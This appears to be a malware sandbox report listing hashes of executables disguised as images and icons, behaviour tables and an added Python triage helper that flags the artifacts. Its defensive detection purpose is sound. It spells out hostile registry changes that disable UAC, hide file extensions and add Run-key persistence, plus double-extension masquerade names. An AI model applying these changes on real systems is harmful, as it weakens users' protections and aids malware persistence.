SHA256 bbc77f84956ed7ea615d09256292725bea9a90c60cc849a783facc12b8b68b1c
SHA512 a0793fb8168b4cd765dc80beb6a9d4e3929337d0a27c1f007e34493f098f596188d93ff81b9f916cd398425534c11ff250a9a500aa468b879650d1f085c003fc

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.exe

MD5 4e5e23a47f8be33cc4bb92c88edb1785
SHA1 b14407c89be21db831f007d51b2dac3a05b40d6a
SHA256 4dbe50840d8c2216279f99cf109c49a1e6be9d59c5031f8b5cb463c286c4d2d6
SHA512 3c2edda88d23c3414198d1f90c89e5aee27e888253ea21dc1dbd21e74e84a0706ebd135f84c1185d213304eecbe1c1abf6c5ecde6f0c4c89600b5dca2bd1970c

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.exe

MD5 6acc1fca863e347299745af440304555
SHA1 9d3f03058e87a27e6145ccc639baecf16036fd7b
SHA256 0c6854dcf15e303219dff0eb4206e03b0cea7e40663de27c29005e0b16f45d47
SHA512 ceffbfc168a4c5b063d221430220556a0aa589a5ddb4afc2ca6cbbfc96da3891e0264ab4a8faf70c80258dbde5319a00e6427dd4468d359796a30d252b1972d3

C:\ProgramData\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.exe

MD5 f8f0474d44be329038ec406baa9cadc5
SHA1 3927f3b6805a428c3ead326256c2d83e126c18ad
SHA256 0a3939bdec913e1e07bb82cfc53decde902a93727b528bfd0bb68f590f280252
SHA512 04557954e7c7af41bd655a8b6a76c7da881fed2d1be9aa449acb0063c333a22e3ee21177be319aff8a00cc6dfd0017c0dc201ad6864841831f34037f2ed77398

C:\ProgramData\Microsoft\User Account Pictures\user.bmp.exe

MD5 7de3adcb784f128d1a0e817928b2bcc4
SHA1 c1aa6ebbb6db6cffdfd50c087c8f0f4b763fd251
SHA256 4d94c82478dbc6a9b23f335d89a88d4184da9c842e8ea052aa2dd93dc598a2e4
SHA512 ff611c4db76c3606bd1f8dce4b276b0ee81beb73a5559a96f41f8460a463b057bd155b60595928362d7d19fbfd403fe61ebc15a4669b732f2c3bc07679c5ac40

C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe

MD5 8464d02d336c88cc6336a8627261a6d4
SHA1 5899bc403b5e9bd7fc39421094a7969740566eb1
SHA256 225231cbf71c85ee520b3eb1958bcc040c42dee6e26ae1b66dabaec49d048a56
SHA512 7bf0418b71968513dd4de1f98125bcd017db1caa8e754b4286964b1b5cd518098c3fcb93ce27d3f552f18664e0c424d89178a411ba2fb629d05c7295e38a42b0

C:\Users\Admin\AppData\Local\Temp\rYwI.ico

MD5 ac4b56cc5c5e71c3bb226181418fd891
SHA1 e62149df7a7d31a7777cae68822e4d0eaba2199d
SHA256 701a17a9ee5c9340bae4f0810f103d1f0ca5c03141e0da826139d5b7397a6fb3
SHA512 a8136ef9245c8a03a155d831ed9b9d5b126f160cdf3da3214850305d726d5d511145e0c83b817ca1ac7b10abccb47729624867d48fede0c46da06f4ac50cf998

C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe

MD5 5be8b33694e3095627d8ad565a2ee141
SHA1 c772f18ecf5c23e115d15b2ced5332e4b437917c
SHA256 51a9265f6da68e1011f6eb249f5cb80f21391399e901676b73dbadb483fc5553
SHA512 5efea1ca0afed1831a0b7a6e9a5a3f1f1f422a958714a465185c9fb3c51c393ecea3bbc6a0457ae61475a0d4a5074da4e2ce4e3c266407ce091a7c81166d6bc4

C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\vcredist_x86.exe

MD5 d4ca70603f09055ba2263247f6d45a78
SHA1 e44a179a6141f53956a05e216732abd5a80b125e
SHA256 785dd314cfa1330e965a02832c6e6904e2e582685497596549f833ffdeed5766
SHA512 2875c30da613cb888d1a441b936760997eeb989b27c78029727949b2935ae4650cb0c485959ba9092e6ced2f980b315e59ba7bdcfa12326e8fd74c83caf72dbc

C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe

MD5 2908f68e347d41ea3257f1a82da3749c
SHA1 5aa2e0d8f4e47fd45a2c48a090dbbe8b731b6723
SHA256 502c0c7cbb758a61f8bcc02039ad5c11737ac279a7fc594336381ba4dca36b71
SHA512 8278b6f7662362ad8cf8aa6dad9f316206ef75f4e5e17758a70e5ee5153e413ad43415f704eea6774cc6886dfd3f2a00cc5063a54a7193eaddf47a7628e74849

C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\vcredist_x64.exe

MD5 4e3d844c50d5001d6f2a5b4cfd7f4ee0
SHA1 88b29b40da9136c2945283cbd8fcf75fbc571a8a
SHA256 970f367b7789a8659672a965709488b2cba806fed9651a5d240144fa6f527df4
SHA512 9123ef4036e58dd5bf2ec13b73b5846db3b417c6173c3d8804fe9376840f68b8d924de925249da3367499ffd55e0533a6a51251fc8ad86387584b1b1900cf145

C:\Users\Admin\AppData\Local\Temp\uMkG.exe

MD5 5cef38dbd2f39d960a24d6a99b83be92
SHA1 874d186e8f9e2a4636cc35c287c5228ecd3e405b
SHA256 6f0158bfa1144aaf8d96576872e51d9f8731e562df38f47f13d53832b1fb9c9d
SHA512 0ab9ca527be5090a865a331d9d2beedc08bba6606a8c0d20c9af49a0b6c5417f975c2a679ec653f68c3ae90e1dcf37717f639de58f9286b3a276f54170adccc3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\192.png.exe

MD5 b8ab8e89eeb541b246406c9d98ed003e
SHA1 62d506879fe3b3d15ecd85d94666467a34039030
SHA256 97f070f43dd8c90261eec8dae4e4f7c314ec596782ec05bbe6cee152e0211a23
SHA512 422b88b6c3101e30e72fbbf517df35d24b61ce3124f4b85bba636f7d286c4b74747721b7dffee6b3c0562e3da85373ded822b40f2ad121e29f2a4e6d0df8e329

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\256.png.exe

MD5 c77ea1decc0a152db0190a1067449ecd
SHA1 6e67c28b2dafda012516f074c3a128289ee0274a
SHA256 2667f5e76e44b1f740a442cfc56258f631f60bb9523c346f92a3d74ec35c017b
SHA512 5dcc842ea4d45200e8728f16ee4835e9769108061766afddd1f657eeda725185b2ca273f7bc34a4a9627ffb108b895ef0fe3f2be6b40e02e49fcd162a5a48268

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\32.png.exe

MD5 4cb4e3f98da4ee90aa185237497a57c6
SHA1 c6522674e64eebb795d68b9cc93f080be324a929
SHA256 68427c6ab16d606571b7bbf16c78be578d3d2a7f44a083aa48dc45bf51e32608
SHA512 62ef45611c8c66b6b5a402f6aec08f0622c2c01ef360f586b260a885adb20f53379fb98940a17d633218659230b5cbeebdfe6f84862ae1dcb8b0d4f8d79555c4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\48.png.exe

MD5 c1552744ac18d47e7e11a1e53bd100cf
SHA1 38dda7020ce450725e3fd9ed3aa6db3be2d8c05f
SHA256 665a6edc80513d39f280fbc9fd2336891c7454346293577ca64873ef14fbd539
SHA512 a0ff89aa0c18a0e42deb8417e99aea30c96af9a602232c253a054e0bd2784865221a615f71fed4249bc77e62ebc170019edea933cf432bcd58f9e2142f8ac427

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons\64.png.exe

MD5 3acb3513ce2800ef6ccf33d37a030dfe

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-06 00:10

Reported

2024-11-06 00:12

Platform

win10v2004-20241007-en

Max time kernel

120s

Max time network

107s

Command Line

"C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion
With HideFileExt = "1", Explorer hides the final extension of known file types, so the renamed copies listed above (for example Koala.jpg.exe or Sleep Away.mp3.exe) display as the original media files. The value is written repeatedly by reg.exe rather than by Explorer itself, which is the anomaly to alert on; the rows below are identical and are collapsed with their counts.
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\SysWOW64\reg.exe N/A (50 identical rows)
Set value (int) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" N/A N/A (14 identical rows, process not recorded)

UAC bypass

evasion trojan
Despite the signature name, EnableLUA = "0" does not bypass a UAC prompt: it switches User Account Control off for the whole machine, effective after the next restart. The value lives under HKLM and can only be written with administrative rights. The 64 rows below are identical and are collapsed with their counts.
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A (52 identical rows)
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A (12 identical rows, process not recorded)

Renames multiple (86) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\ProgramData\xGYksgIk\mucsYUUU.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gwooEwMc.exe = "C:\\Users\\Admin\\lKwcEkEY\\gwooEwMc.exe" C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\mucsYUUU.exe = "C:\\ProgramData\\xGYksgIk\\mucsYUUU.exe" C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gwooEwMc.exe = "C:\\Users\\Admin\\lKwcEkEY\\gwooEwMc.exe" C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\mucsYUUU.exe = "C:\\ProgramData\\xGYksgIk\\mucsYUUU.exe" C:\ProgramData\xGYksgIk\mucsYUUU.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\shell32.dll.exe C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
File opened for modification C:\Windows\SysWOW64\shell32.dll.exe C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
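The registry and file artifacts in the tables above (EnableLUA forced to 0, HideFileExt forced to 1 by reg.exe, Run entries pointing into the user profile and ProgramData, and the double-extension drop shell32.dll.exe in SysWOW64) are the signals a responder would hunt for on other hosts. The triage helper below is an added example, not code from the sandbox or from the sample: it applies those four checks to Sysmon-style records. The Event tuple layout is an assumed simplification of Sysmon Event ID 13 (RegistryEvent: Value Set) and Event ID 11 (FileCreate), the rule names are this example's own, and every record in SAMPLE_EVENTS is constructed (the malicious ones mirror the rows above, the benign ones show what the rules deliberately ignore).

```python
"""Triage helper: flag the registry and file artifacts listed above in
Sysmon-style event records. Added example, not sandbox or sample code;
the Event layout is an assumed stand-in for Sysmon Event ID 13
(RegistryEvent: Value Set) and Event ID 11 (FileCreate)."""
import re
from typing import List, NamedTuple, Tuple


class Event(NamedTuple):
    event_id: int   # 13 = registry value set, 11 = file create (assumed layout)
    image: str      # process that performed the action
    target: str     # registry value path or created file path
    details: str    # Sysmon-style value data, e.g. "DWORD (0x00000001)"


# Directories a standard user can write to; a Run entry pointing here is the
# pattern in the persistence table (lKwcEkEY under the profile, xGYksgIk
# under ProgramData).
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")
# Inner extensions of the renamed files above (.jpg.exe, .mp3.exe, .bmp.exe,
# .dll.exe); with HideFileExt=1 Explorer shows only the inner one.
MASQ_INNER_EXTS = {".bmp", ".jpg", ".jpeg", ".png", ".mp3", ".wav", ".dll", ".doc", ".pdf"}
DWORD_RE = re.compile(r"DWORD\s*\(0x([0-9a-f]+)\)", re.I)
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\")


def dword(details: str):
    """Decode Sysmon's 'DWORD (0x...)' rendering; None for non-DWORD data."""
    m = DWORD_RE.match(details)
    return int(m.group(1), 16) if m else None


def classify(ev: Event) -> List[Tuple[str, str]]:
    """Return (rule, severity) pairs matched by one event."""
    hits = []
    t, img = ev.target.lower(), ev.image.lower()
    if ev.event_id == 13:
        # UAC bypass signature: EnableLUA forced to 0 in the machine policy.
        if t.endswith("\\policies\\system\\enablelua") and dword(ev.details) == 0:
            hits.append(("uac_disabled", "high"))
        # Explorer writes HideFileExt itself when a user toggles the option;
        # reg.exe or any other writer is the anomaly worth alerting on.
        if (t.endswith("\\explorer\\advanced\\hidefileext")
                and dword(ev.details) == 1 and not img.endswith("\\explorer.exe")):
            hits.append(("hide_file_ext_by_non_explorer", "medium"))
        # Run/RunOnce value whose command lives in a user-writable directory.
        if RUN_KEY_RE.search(t) and ev.details.strip('"').lower().startswith(USER_WRITABLE):
            hits.append(("run_key_user_writable_path", "high"))
    elif ev.event_id == 11:
        # name.<inner>.exe masquerade; worst when dropped under System32/SysWOW64.
        parts = t.rsplit("\\", 1)[-1].split(".")
        if len(parts) >= 3 and parts[-1] == "exe" and "." + parts[-2] in MASQ_INNER_EXTS:
            in_sysdir = "\\windows\\system32\\" in t or "\\windows\\syswow64\\" in t
            hits.append(("double_extension_exe", "high" if in_sysdir else "medium"))
    return hits


def triage(events) -> List[Tuple[str, str, str, str]]:
    """Flatten hits to (image, target, rule, severity) rows."""
    return [(ev.image, ev.target, rule, sev) for ev in events for rule, sev in classify(ev)]


HKU = r"HKU\S-1-5-21-2437139445-1151884604-3026847218-1000"
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe"
# Constructed records mirroring the behavioral2 tables, followed by three benign ones.
SAMPLE_EVENTS = [
    Event(13, r"C:\Windows\SysWOW64\reg.exe",
          r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", "DWORD (0x00000000)"),
    Event(13, r"C:\Windows\SysWOW64\reg.exe",
          HKU + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "DWORD (0x00000001)"),
    Event(13, SAMPLE, HKU + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gwooEwMc.exe",
          r"C:\Users\Admin\lKwcEkEY\gwooEwMc.exe"),
    Event(13, SAMPLE, r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\mucsYUUU.exe",
          r"C:\ProgramData\xGYksgIk\mucsYUUU.exe"),
    Event(11, r"C:\Users\Admin\lKwcEkEY\gwooEwMc.exe", r"C:\Windows\SysWOW64\shell32.dll.exe", ""),
    Event(11, SAMPLE, r"C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.exe", ""),
    # Benign (constructed): the user toggled the Explorer option, an installer
    # registered an agent under Program Files, and a versioned installer name has two dots.
    Event(13, r"C:\Windows\explorer.exe",
          HKU + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "DWORD (0x00000001)"),
    Event(13, r"C:\Windows\System32\msiexec.exe",
          r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent", r"C:\Program Files\Vendor\agent.exe"),
    Event(11, r"C:\Windows\System32\msiexec.exe", r"C:\Program Files\Vendor\setup.x64.exe", ""),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(" | ".join(row))
```

Run as-is it prints six hits, one per malicious record, and nothing for the three benign ones. The HideFileExt rule keys on the writing process rather than the value because the value alone is a legitimate user preference; the Run-key rule keys on where the command lives rather than on the value name, since the names here (gwooEwMc, mucsYUUU) are random and will differ on the next sample.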

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
The NLS\Language key is read during ordinary process start-up, so the hits from cmd.exe, reg.exe and cscript.exe reflect the sample's child processes initialising rather than a separate discovery step; the useful signal in this table is the set of processes, not the key access itself. The 64 rows are identical apart from the process column and are collapsed with their counts.
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A (28 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A (16 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A (7 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A (4 identical rows)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A (9 identical rows, process not recorded)

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A (48 identical rows)
N/A N/A N/A N/A (16 identical rows, process not recorded)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
